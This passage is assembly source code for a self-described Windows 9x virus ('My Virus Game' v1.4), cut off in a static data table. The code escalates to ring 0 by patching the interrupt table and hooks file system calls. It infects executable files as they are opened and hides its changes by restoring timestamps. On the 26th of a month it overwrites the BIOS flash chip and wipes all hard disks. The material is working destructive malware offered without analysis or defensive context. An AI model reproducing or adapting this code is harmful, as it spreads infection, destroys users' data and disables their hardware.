+OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +MajorVirusVersion = 1 +MinorVirusVersion = 4 + +VirusVersion = MajorVirusVersion*10h+MinorVirusVersion + + +IF DEBUG + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 05h + +ELSE + + FirstKillHardDiskNumber = 80h + HookExceptionNumber = 03h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + + lea eax, [esp-04h*2] + + xor ebx, ebx + xchg eax, fs:[ebx] + + call @0 +@0: + pop ebx + + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... * +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + + cli + + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + + lea esi, MyExceptionHook-@1[ecx] + + push esi + + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + + rep movsb + + sub eax, 08h + + mov esi, [eax] + + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + + xor ebx, ebx + + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. * +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + + xchg edi, eax ; EDI = SystemMemory Start Address + + lea eax, MyVirusStart-@2[esi] + + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ ; + dd 00400067h ; Use EAX, ECX, EDX, and flags + + mov dr0, eax ; Save OldFileSystemApiHook Address + + pop eax ; EAX = FileSystemApiHook Address + + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + + cli + + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + push eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + mov dr0, eax ; Adjust OldFileSystemApiHook Address + + pop eax + + pop ebx + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? + +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + ; mov esi, offset FileNameBuffer + add esi, FileNameBuffer-@6 + + push esi + + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + + add al, 40h + mov ah, ':' + + mov [esi], eax + + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. * +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + ; cmp [esi+eax-04h], '.EXE' + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + ; cmp [esi+eax-06h], 'FUCK' + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + + jc DisableOnBusy + + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? * +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + + pushf + + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + + push 00000004h + pop ecx + push 0000003ch + pop edx + call edi ; VXDCall IFSMgr_Ring0_FileIO + + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? * +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** +; * WinZip Self-Extractor * +; * doesn't Have Infected * +; * Mark Because My Virus * +; * doesn't Infect it. * +; *************************** + + ; cmp [esi], '\0PE\0' + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** +; * Save ESP Register * +; *************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + + sub ecx, (SizeOfHeaders-@9)[esi] + not ecx + inc ecx + + ; Save My Virus First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + + xchg ecx, eax ; ECX = Size of Section Table + + ; Save Original Address of Entry Point + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + + cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection + jl OnlySetInfectedMark + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Full Modify the Bug : * +; * WinZip Self-Extractor * +; * Occurs Error... * +; *************************** +; * So When User Opens * +; * WinZip Self-Extractor, * +; * Virus Doesn't Infect it.* +; *************************** +; * First, Virus Gets the * +; * PointerToRawData in the * +; * Second Section Table, * +; * Reads the Section Data, * +; * and Tests the String of * +; * 'WinZip(R)'...... * +; *************************** + + xchg eax, ebp + + push 00000004h + pop ecx + + push edx + mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi] + add edx, 12h + + call edi ; VXDCall IFSMgr_Ring0_FileIO + + ; cmp [esi], 'nZip' + cmp dword ptr [esi], 'piZn' + je NotSetInfectedMark + + pop edx + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + + push edi ; Size + + add edx, ebp + push edx ; Pointer of File + + add ebp, esi + push ebp ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [ebp+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + + add edx, edi + push edx ; Pointer of File + + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + + push ebx ; Size + + sub eax, 08h + mov [eax], ebx + + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + + push edi ; Address of Buffer + + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h + +StartToWriteCodeToSections: + + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + + add edi, ebx ; Move Address of Buffer + +EndOfWriteCodeToSections: + + loop LoopOfWriteCodeToSections + +; *************************** +; * Only Set Infected Mark * +; *************************** + +OnlySetInfectedMark: + mov esp, dr1 + + jmp WriteVirusCodeToFile + +; *************************** +; * Not Set Infected Mark * +; *************************** + +NotSetInfectedMark: + add esp, 3ch + + jmp CloseFile + +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** + +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx + +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. ^__^ * +; *************************** + + lea eax, (LastVxDCallAddress-2-@9)[esi] + + mov cl, VxDCallTableSize + +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + + loop LoopOfRestoreVxDCallID + +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** + +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] + +LoopOfWriteVirusCodeToFile: + + pop ecx + jecxz SetFileModificationMark + + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + + call edi ; VXDCall IFSMgr_Ring0_FileIO + + jmp LoopOfWriteVirusCodeToFile + +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** + +SetFileModificationMark: + pop ebx + pop eax + + stc ; Enable CF(Carry Flag) + pushf + +; ************************************* +; * Close File * +; ************************************* + +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Need to Restore File Modification * +; * Time !? * +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + + mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + + ret + +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Day from BIOS CMOS + mov al, 07h + out 70h, al + in al, 71h + + xor al, 26h ; ??/26/???? + +IF DEBUG + jmp DisableOnBusy +ELSE + jnz DisableOnBusy +ENDIF + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... * +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + out dx, al + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath + +VxDCallIDTable dd 00010053h, 00400068h, 